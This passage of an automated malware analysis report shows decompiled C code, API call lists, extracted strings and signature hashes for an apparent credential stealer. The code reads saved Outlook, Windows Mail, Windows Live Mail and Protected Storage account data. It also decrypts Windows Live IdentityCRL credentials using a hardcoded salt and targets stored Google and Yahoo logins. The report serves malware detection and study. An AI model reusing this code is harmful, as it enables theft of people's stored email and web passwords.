				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
				_t127 = _t60;
				if(_t60 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t127, _t131, _t98);
				}
				E0040E8AB(_t89);
				E004047F1(_t98 + 0x890);
				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
				E0040329E(_t131, _t98);
				E004034CB(_t91, _t127, _t131, _t98); // executed
				E0040396C(_t127, _t131, _t98); // executed
				E004037B1(_t91, _t98, _t131, _t98); // executed
				_t73 = _t98 + 0xb20;
				_t128 =  *_t73;
				if( *_t73 != 0) {
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
				}
				_t106 = _t98 + 0xc25;
				_t129 =  *_t106;
				if( *_t106 != 0) {
					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
				}
				_push(_t98 + 0x640); // executed
				E0040D9F9(_t129); // executed
				E0040D865(_t98 + 0x640);
				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
				return _t76;
			}





















                                                                                              0x00403c3d
                                                                                              0x00403c3d
                                                                                              0x00403c40
                                                                                              0x00403c44
                                                                                              0x00403c46
                                                                                              0x00403c4c
                                                                                              0x00403c52
                                                                                              0x00403c5c
                                                                                              0x00403c66
                                                                                              0x00403c69
                                                                                              0x00403c9b
                                                                                              0x00403c9d
                                                                                              0x00403c6b
                                                                                              0x00403c71
                                                                                              0x00403c79
                                                                                              0x00403c7b
                                                                                              0x00403c7e
                                                                                              0x00403c83
                                                                                              0x00000000
                                                                                              0x00403c85
                                                                                              0x00403c88
                                                                                              0x00403c8c
                                                                                              0x00403c8e
                                                                                              0x00403c90
                                                                                              0x00000000
                                                                                              0x00403c92
                                                                                              0x00403c92
                                                                                              0x00403c92
                                                                                              0x00403c90
                                                                                              0x00403c83
                                                                                              0x00403ca8
                                                                                              0x00403cb2
                                                                                              0x00403cbc
                                                                                              0x00403cc6
                                                                                              0x00403cd0
                                                                                              0x00403cdb
                                                                                              0x00403cdc
                                                                                              0x00403ce8
                                                                                              0x00403cf4
                                                                                              0x00403d07
                                                                                              0x00403d0f
                                                                                              0x00403d11
                                                                                              0x00403d19
                                                                                              0x00403d19
                                                                                              0x00403d2c
                                                                                              0x00403d34
                                                                                              0x00403d36
                                                                                              0x00403d3e
                                                                                              0x00403d3e
                                                                                              0x00403d44
                                                                                              0x00403d49
                                                                                              0x00403d53
                                                                                              0x00403d5f
                                                                                              0x00403d60
                                                                                              0x00403d69
                                                                                              0x00403d62
                                                                                              0x00403d62
                                                                                              0x00403d62
                                                                                              0x00403d6e
                                                                                              0x00403d73
                                                                                              0x00403d7b
                                                                                              0x00403d7d
                                                                                              0x00403d8a
                                                                                              0x00403d7f
                                                                                              0x00403d83
                                                                                              0x00403d83
                                                                                              0x00403d9f
                                                                                              0x00403da9
                                                                                              0x00403db1
                                                                                              0x00403db3
                                                                                              0x00403dc0
                                                                                              0x00403db5
                                                                                              0x00403db9
                                                                                              0x00403db9
                                                                                              0x00403dc9
                                                                                              0x00403dd4
                                                                                              0x00403de0
                                                                                              0x00403dec
                                                                                              0x00403df2
                                                                                              0x00403df8
                                                                                              0x00403dfe
                                                                                              0x00403e04
                                                                                              0x00403e09
                                                                                              0x00403e0f
                                                                                              0x00403e12
                                                                                              0x00403e1d
                                                                                              0x00403e27
                                                                                              0x00403e27
                                                                                              0x00403e2c
                                                                                              0x00403e32
                                                                                              0x00403e35
                                                                                              0x00403e45
                                                                                              0x00403e55
                                                                                              0x00403e5f
                                                                                              0x00403e5f
                                                                                              0x00403e6a
                                                                                              0x00403e6b
                                                                                              0x00403e71
                                                                                              0x00403e7d
                                                                                              0x00403e86

                                                                                              APIs
                                                                                                • Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
                                                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
                                                                                              • strcpy.MSVCRT(?,?), ref: 00403E45
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
                                                                                              • PStoreCreateInstance, xrefs: 00403C6B
                                                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
                                                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
                                                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403CC1
                                                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
                                                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
                                                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
                                                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
                                                                                              • pstorec.dll, xrefs: 00403C57
                                                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProcstrcpy
                                                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                              • API String ID: 2884822230-961845771
                                                                                              • Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                                              • Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
                                                                                              • Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                                              • Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D9F9, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
				void* _v0;
				void* __esi;
				long _t34;
				long _t36;
				long _t40;
				void* _t64;
				void* _t68;
				int _t73;

				E004118A0(0x102c, _t64);
				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
				if(_t34 != 0) {
					L10:
					return _t34;
				}
				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
				if(_t36 != 0) {
					L9:
					_t34 = RegCloseKey(_v0); // executed
					goto L10;
				}
				_a8 = 0x1000;
				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
				_t81 = _t40;
				if(_t40 == 0) {
					_t63 = _a4 + 0xc;
					if(E004047A0(_a4 + 0xc, _t81) != 0) {
						_a20 = _a8;
						_a24 =  &_a40;
						_t73 = 0x40;
						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
						_a28 = _t73;
						_a32 = _t68;
						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
							if(_a12 < 0x400) {
								memcpy( &_a40, _t68, _t73);
								memcpy( &_a104, _a16, _a12);
								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
							}
							LocalFree(_a16);
						}
					}
				}
				RegCloseKey(_a4);
				goto L9;
			}











                                                                                              0x0040da04
                                                                                              0x0040da2a
                                                                                              0x0040da2e
                                                                                              0x0040db30
                                                                                              0x0040db36
                                                                                              0x0040db36
                                                                                              0x0040da44
                                                                                              0x0040da48
                                                                                              0x0040db26
                                                                                              0x0040db2a
                                                                                              0x00000000
                                                                                              0x0040db2a
                                                                                              0x0040da67
                                                                                              0x0040da6f
                                                                                              0x0040da75
                                                                                              0x0040da77
                                                                                              0x0040da80
                                                                                              0x0040da8c
                                                                                              0x0040da96
                                                                                              0x0040daa0
                                                                                              0x0040daa4
                                                                                              0x0040dab4
                                                                                              0x0040dabb
                                                                                              0x0040dabf
                                                                                              0x0040daca
                                                                                              0x0040dad4
                                                                                              0x0040dadd
                                                                                              0x0040daf2
                                                                                              0x0040db0d
                                                                                              0x0040db0d
                                                                                              0x0040db16
                                                                                              0x0040db16
                                                                                              0x0040daca
                                                                                              0x0040da8c
                                                                                              0x0040db20
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
                                                                                              • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
                                                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20
                                                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                              • memcpy.MSVCRT ref: 0040DADD
                                                                                              • memcpy.MSVCRT ref: 0040DAF2
                                                                                                • Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                                • Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
                                                                                                • Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                                • Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                              • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                              • API String ID: 2768085393-1693574875
                                                                                              • Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                              • Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
                                                                                              • Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                              • Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00411654, Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t39;
				void _t41;
				intOrPtr _t48;
				signed int _t50;
				int _t52;
				intOrPtr _t55;
				signed int _t56;
				signed int _t57;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t65;
				intOrPtr* _t69;
				int _t70;
				void* _t71;
				intOrPtr _t79;

				_push(0x70);
				_push(0x4123e0);
				E00411840(__ebx, __edi, __esi);
				_t33 = GetModuleHandleA(0);
				if(_t33->i != 0x5a4d) {
					L4:
					 *(_t71 - 0x1c) = 0;
				} else {
					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
					if( *_t65 != 0x4550) {
						goto L4;
					} else {
						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
						if(_t56 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t57 = 0;
								__eflags =  *(_t65 + 0xe8);
								goto L9;
							}
						} else {
							if(_t56 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t57 = 0;
									__eflags =  *(_t65 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t71 - 4) = 0;
				__set_app_type(2);
				 *0x417b6c =  *0x417b6c | 0xffffffff;
				 *0x417b70 =  *0x417b70 | 0xffffffff;
				_t35 = __p__fmode();
				_t62 =  *0x416b8c; // 0x0
				 *_t35 = _t62;
				_t36 = __p__commode();
				_t63 =  *0x416b88; // 0x0
				 *_t36 = _t63;
				 *0x417b68 =  *_adjust_fdiv;
				_t39 = E00401A4D();
				_t79 =  *0x416000; // 0x1
				if(_t79 == 0) {
					__setusermatherr(E00401A4D);
					_pop(_t63);
				}
				E0041182C(_t39);
				_push(0x4123b0);
				_push(0x4123ac);
				L00411826();
				_t41 =  *0x416b84; // 0x0
				 *(_t71 - 0x20) = _t41;
				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
				_push(0x4123a8);
				_push(0x412394); // executed
				L00411826(); // executed
				_t69 =  *_acmdln;
				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
				if( *_t69 != 0x22) {
					while(1) {
						__eflags =  *_t69 - 0x20;
						if(__eflags <= 0) {
							goto L17;
						}
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				} else {
					do {
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
						_t55 =  *_t69;
					} while (_t55 != 0 && _t55 != 0x22);
					if( *_t69 == 0x22) {
						L16:
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				}
				L17:
				_t48 =  *_t69;
				if(_t48 != 0 && _t48 <= 0x20) {
					goto L16;
				}
				 *(_t71 - 0x4c) = 0;
				GetStartupInfoA(_t71 - 0x78);
				_t87 =  *(_t71 - 0x4c) & 0x00000001;
				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
					_t50 = 0xa;
				} else {
					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
				}
				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
				_t70 = _t52;
				 *(_t71 - 0x7c) = _t70;
				if( *(_t71 - 0x1c) == 0) {
					exit(_t70); // executed
				}
				__imp___cexit();
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				return E00411879(_t70);
			}





















                                                                                              0x00411654
                                                                                              0x00411656
                                                                                              0x0041165b
                                                                                              0x00411669
                                                                                              0x00411670
                                                                                              0x00411691
                                                                                              0x00411691
                                                                                              0x00411672
                                                                                              0x00411675
                                                                                              0x0041167d
                                                                                              0x00000000
                                                                                              0x0041167f
                                                                                              0x0041167f
                                                                                              0x00411688
                                                                                              0x004116a9
                                                                                              0x004116ad
                                                                                              0x00000000
                                                                                              0x004116af
                                                                                              0x004116af
                                                                                              0x004116b1
                                                                                              0x00000000
                                                                                              0x004116b1
                                                                                              0x0041168a
                                                                                              0x0041168f
                                                                                              0x00411696
                                                                                              0x0041169d
                                                                                              0x00000000
                                                                                              0x0041169f
                                                                                              0x0041169f
                                                                                              0x004116a1
                                                                                              0x004116b7
                                                                                              0x004116b7
                                                                                              0x004116b7
                                                                                              0x004116ba
                                                                                              0x004116ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041168f
                                                                                              0x00411688
                                                                                              0x0041167d
                                                                                              0x004116bd
                                                                                              0x004116c2
                                                                                              0x004116c9
                                                                                              0x004116d0
                                                                                              0x004116d7
                                                                                              0x004116dd
                                                                                              0x004116e3
                                                                                              0x004116e5
                                                                                              0x004116eb
                                                                                              0x004116f1
                                                                                              0x004116fa
                                                                                              0x004116ff
                                                                                              0x00411704
                                                                                              0x0041170a
                                                                                              0x00411711
                                                                                              0x00411717
                                                                                              0x00411717
                                                                                              0x00411718
                                                                                              0x0041171d
                                                                                              0x00411722
                                                                                              0x00411727
                                                                                              0x0041172c
                                                                                              0x00411731
                                                                                              0x00411750
                                                                                              0x00411753
                                                                                              0x00411758
                                                                                              0x0041175d
                                                                                              0x0041176a
                                                                                              0x0041176c
                                                                                              0x00411772
                                                                                              0x004117ae
                                                                                              0x004117ae
                                                                                              0x004117b1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004117b3
                                                                                              0x004117b4
                                                                                              0x004117b4
                                                                                              0x00411774
                                                                                              0x00411774
                                                                                              0x00411774
                                                                                              0x00411775
                                                                                              0x00411778
                                                                                              0x0041177a
                                                                                              0x00411785
                                                                                              0x00411787
                                                                                              0x00411787
                                                                                              0x00411788
                                                                                              0x00411788
                                                                                              0x00411785
                                                                                              0x0041178b
                                                                                              0x0041178b
                                                                                              0x0041178f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00411795
                                                                                              0x0041179c
                                                                                              0x004117a2
                                                                                              0x004117a6
                                                                                              0x004117bb
                                                                                              0x004117a8
                                                                                              0x004117a8
                                                                                              0x004117a8
                                                                                              0x004117c3
                                                                                              0x004117c8
                                                                                              0x004117ca
                                                                                              0x004117d0
                                                                                              0x004117d3
                                                                                              0x004117d3
                                                                                              0x004117d9
                                                                                              0x0041180e
                                                                                              0x00411819

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                              • String ID:
                                                                                              • API String ID: 3662548030-0
                                                                                              • Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                                              • Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
                                                                                              • Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                                              • Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410D1B, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 92%
                                                                                              			E00410D1B(void* __eflags, intOrPtr _a4) {
				void _v275;
				char _v276;
				char _v532;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void* __edi;
				void* __esi;
				int _t44;
				char* _t46;
				char* _t48;
				void* _t64;
				intOrPtr _t65;
				void* _t66;
				signed int _t68;
				void* _t74;
				void* _t75;

				_t75 = __eflags;
				_v796 = 0;
				memset( &_v795, 0, 0x104);
				_t64 = 0x1c;
				_t61 =  &_v796;
				 *((intOrPtr*)(_a4 + 4)) = 1;
				E0040EE59( &_v796, _t64); // executed
				E00406734( &_v796, "\\Microsoft\\Windows Mail");
				_t65 = _a4;
				E00410C43(_t65, _t75, _t61); // executed
				 *((intOrPtr*)(_t65 + 4)) = 2;
				_t66 = 0x1c;
				E0040EE59(_t61, _t66);
				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
				E00410C43(_a4, _t75, _t61); // executed
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_v540 = 0;
				memset( &_v539, 0, 0x104);
				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
				_t44 = strlen( &_v540);
				if(_t44 > 0) {
					_t48 = _t74 + _t44 + 0x117;
					if( *_t48 == 0x5c) {
						 *_t48 = 0;
					}
				}
				_push( &_v532);
				_t46 =  &_v796;
				_push(_t46);
				L004115B2();
				_t78 = _t46;
				if(_t46 != 0) {
					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
				}
				return _t46;
			}





















                                                                                              0x00410d1b
                                                                                              0x00410d37
                                                                                              0x00410d3c
                                                                                              0x00410d49
                                                                                              0x00410d4a
                                                                                              0x00410d4e
                                                                                              0x00410d55
                                                                                              0x00410d5f
                                                                                              0x00410d64
                                                                                              0x00410d6d
                                                                                              0x00410d72
                                                                                              0x00410d7b
                                                                                              0x00410d7c
                                                                                              0x00410d86
                                                                                              0x00410d92
                                                                                              0x00410da2
                                                                                              0x00410daa
                                                                                              0x00410dbd
                                                                                              0x00410dc5
                                                                                              0x00410de5
                                                                                              0x00410dea
                                                                                              0x00410dfe
                                                                                              0x00410e0c
                                                                                              0x00410e14
                                                                                              0x00410e16
                                                                                              0x00410e20
                                                                                              0x00410e22
                                                                                              0x00410e22
                                                                                              0x00410e20
                                                                                              0x00410e2c
                                                                                              0x00410e2d
                                                                                              0x00410e31
                                                                                              0x00410e32
                                                                                              0x00410e37
                                                                                              0x00410e3b
                                                                                              0x00410e48
                                                                                              0x00410e48
                                                                                              0x00410e53

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00410D3C
                                                                                                • Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
                                                                                                • Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
                                                                                                • Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                                • Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
                                                                                                • Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                                • Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                              • memset.MSVCRT ref: 00410DAA
                                                                                              • memset.MSVCRT ref: 00410DC5
                                                                                                • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
                                                                                              • strlen.MSVCRT ref: 00410E0C
                                                                                              • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32
                                                                                              Strings
                                                                                              • \Microsoft\Windows Live Mail, xrefs: 00410D81
                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
                                                                                              • \Microsoft\Windows Mail, xrefs: 00410D5A
                                                                                              • Store Root, xrefs: 00410DD6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                              • API String ID: 4071991895-2578778931
                                                                                              • Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                                              • Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
                                                                                              • Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                                              • Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004037B1, Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 76%
                                                                                              			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v792;
				intOrPtr _v796;
				char _v924;
				char _v936;
				void _v1959;
				char _v1960;
				void _v2983;
				char _v2984;
				void* __ebx;
				void* __esi;
				void* _t28;
				void* _t50;
				void* _t51;
				char* _t59;
				char* _t63;
				void* _t70;

				_t70 = __fp0;
				_t51 = __ecx;
				_v1960 = 0;
				memset( &_v1959, 0, 0x3ff);
				_v2984 = 0;
				memset( &_v2983, 0, 0x3ff);
				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
				if(_t28 == 0) {
					return _t28;
				}
				E004021D8( &_v936);
				_push( &_v1960);
				_t50 = 0x7f;
				E004060D0(_t50,  &_v276);
				_t59 =  &_v404;
				E004060D0(_t50, _t59,  &_v2984);
				_v796 = 9;
				_v408 = 3;
				_t63 = strchr(_t59, 0x40);
				_push( &_v404);
				if(_t63 == 0) {
					if(strlen() + 0xa < 0) {
						sprintf( &_v792, "%s@yahoo.com",  &_v404);
					}
				} else {
					strcpy( &_v792, ??);
					 *_t63 = 0;
				}
				strcpy( &_v924,  &_v404);
				return E00402407( &_v936, _t70, _a4);
			}






















                                                                                              0x004037b1
                                                                                              0x004037b1
                                                                                              0x004037cc
                                                                                              0x004037d2
                                                                                              0x004037e0
                                                                                              0x004037e6
                                                                                              0x004037fc
                                                                                              0x00403803
                                                                                              0x004038cc
                                                                                              0x004038cc
                                                                                              0x00403810
                                                                                              0x0040381b
                                                                                              0x0040381e
                                                                                              0x00403825
                                                                                              0x00403831
                                                                                              0x00403837
                                                                                              0x00403841
                                                                                              0x0040384b
                                                                                              0x0040385d
                                                                                              0x00403868
                                                                                              0x00403869
                                                                                              0x00403889
                                                                                              0x0040389e
                                                                                              0x004038a3
                                                                                              0x0040386b
                                                                                              0x00403872
                                                                                              0x00403879
                                                                                              0x00403879
                                                                                              0x004038b4
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004037D2
                                                                                              • memset.MSVCRT ref: 004037E6
                                                                                                • Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
                                                                                                • Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                                                • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                              • strchr.MSVCRT ref: 00403855
                                                                                              • strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
                                                                                              • strlen.MSVCRT ref: 0040387E
                                                                                              • sprintf.MSVCRT ref: 0040389E
                                                                                              • strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                                                              • String ID: %s@yahoo.com
                                                                                              • API String ID: 1649821605-3288273942
                                                                                              • Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                                              • Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
                                                                                              • Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                                              • Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5
                                                                                              Uniqueness

